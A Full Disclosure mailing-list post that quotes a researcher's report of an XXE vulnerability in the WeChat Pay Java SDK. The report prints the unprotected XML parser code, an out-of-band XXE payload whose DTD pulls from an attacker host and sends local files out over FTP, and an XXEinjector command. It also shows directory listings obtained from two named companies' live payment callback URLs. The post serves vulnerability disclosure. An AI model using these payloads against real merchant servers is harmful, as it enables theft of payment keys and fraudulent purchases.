sorry,there some to fix: it lost "?" character。
shoule be fix : https://pay.weixin.qq.com/wiki/doc/api/app/app.php?chapter=11_1 2018-07-01 8:57 GMT-07:00 Rose Jackcode <1024rosec...@gmail.com>: > Hi List, > > > [Title] > > > XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites) > > > ------------------------------------------ > > > [Background] > > “Mobile payments surge to $9 trillion a year, changing how people shop, > borrow—even panhandle”, as WSJ.com once reported. As a payment security > researcher, I occasionally found a perilous problem about WeChat Pay > which I think may be esay to make use of. Therefore, I hope to be able > to contact with WeChat Pay quickly. > > > ------------------------------------------ > > > [Description] > > When using WeChat payment merchants need providing a notification URL > to accept asynchronous payment results. Unfortunately, WeChat > unintentionally provides a xxe vulnerability in the JAVA version SDK which > handles this result. The attacker can build malicious payload towards the > notification URL to steal any information of the merchant server as he or > she want. Once the attacker get the crucial security key (md5-key and > merchant-Id etc.) of the merchant , he can even buy anything without > paying by just sending forged info to deceive the merchants. > > WeChat can fix it by updating the SDK quite easily, however the bad side > > is while exposing merchants may need a long time to go for the sake of time > , cost and skills needed. > > > ------------------------------------------ > > > [Authors] > > > 1024fresher > > ------------------------------------------ > > > [Detail] > > > The SDK in this page: https://pay.weixin.qq.com/ > wiki/doc/api/jsapi.php chapter=11_1 > > Just in java vision: https://pay.weixin.qq.com/wiki/doc/api/download/ > WxPayAPI_JAVA_v3.zip > > or https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o > 6ud/view( Backup ) > > > > > > README.md in WxPayApi_JAVA_v3.zip,it show more details: > > > > notify code example: > > [ > > String notifyData = "...."; > > MyConfig config = new MyConfig(); > > WXPay wxpay = new WXPay(config); > > //conver to map > > Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData); > > > if (wxpay.isPayResultNotifySignatureValid(notifyMap)) { > > //do business logic > > } > > else { > > } > > > > ] > > WXPayUtil source code > > [ > > > public static Map<String, String> xmlToMap(String strXML) throws > Exception { > > try { > > Map<String, String> data = new HashMap<String, String>(); > > /*** not disabled xxe *****/ > > //start parse > > > DocumentBuilderFactory documentBuilderFactory = > DocumentBuilderFactory.newInstance(); > > DocumentBuilder documentBuilder = documentBuilderFactory. > newDocumentBuilder(); > > InputStream stream = new ByteArrayInputStream(strXML.getBytes( > "UTF-8")); > > org.w3c.dom.Document doc = documentBuilder.parse(stream); > > > > //end parse > > > > > > doc.getDocumentElement().normalize(); > > NodeList nodeList = doc.getDocumentElement().getChildNodes(); > > for (int idx = 0; idx < nodeList.getLength(); ++idx) { > > Node node = nodeList.item(idx); > > if (node.getNodeType() == Node.ELEMENT_NODE) { > > org.w3c.dom.Element element = (org.w3c.dom.Element) > node; > > data.put(element.getNodeName(), element.getTextContent > ()); > > } > > } > > try { > > stream.close(); > > } catch (Exception ex) { > > // do nothing > > } > > return data; > > } catch (Exception ex) { > > WXPayUtil.getLogger().warn("Invalid XML, can not convert to > map. Error message: {}. XML content: {}", ex.getMessage(), strXML); > > throw ex; > > } > > } > > > > ] > > > > > > > > > ------------------------------------------ > > > [Attack demo] > > > > Post merchant notification url with payload: > > > <?xml version="1.0" encoding="utf-8"?> > > <!DOCTYPE root [ > > <!ENTITY % attack SYSTEM "file:///etc/"> > > <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd"> > > %xxe; > > ]> > > > data.dtd: > > > <!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack; > '>"> > > %shell; > > %upload; > > > > or use XXEinjector tool 【https://github.com/enjoiz/XXEinjector】 > > > ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl > > > req.txt : > > POST merchant_notification_url HTTP/1.1 > > Host: merchant_notification_url_host > > User-Agent: curl/7.43.0 > > Accept: */* > > Content-Length: 57 > > Content-Type: application/x-www-form-urlencoded > > > XXEINJECT > > > > > > In order to prove this, I got 2 chinese famous company: > > a、momo: Well-known chat tools like WeChat > > b、vivo :China's famous mobile phone,that also famous in my country > > > > Example momo : > > attack: > > notify url: https://pay.immomo.com/weixin/notify > > cmd: /home/ > > > > result: > > > > *** > > logs > > zhang.jiax** > > zhang.shaol** > > zhang.xia** > > **** > > > attack: > > notify url: https://pay.immomo.com/weixin/notify > > cmd: /home/logs > > > > result: > > *** > > moa-service > > momotrace > > **** > > > Example vivo : > > attack: > > notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo > > cmd: /home/ > > > > result: > > tomcat > > > attack: > > notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo > > cmd: /home/tomcat > > result: > > .bash_logout > > .bash_profile > > .bashrc > > logs > > > attack: > > notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo > > cmd: /home/tomcat/logs > > result: > > **** > > tomcat-2018-06-28.log > > tomcat-2018-06-29.log > > tomcat-2018-06-30.log > > ***** > > > > > > > > > ------------------------------------------ > > > [Reference] > > > https://www.youtube.com/watch?v=BZOg_NgvP18 > > https://www.blackhat.com/docs/us-15/materials/us-15-Wang- > FileCry-The-New-Age-Of-XXE-java-wp.pdf > > > > Regards, > > > 1024rosecode > > > >
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/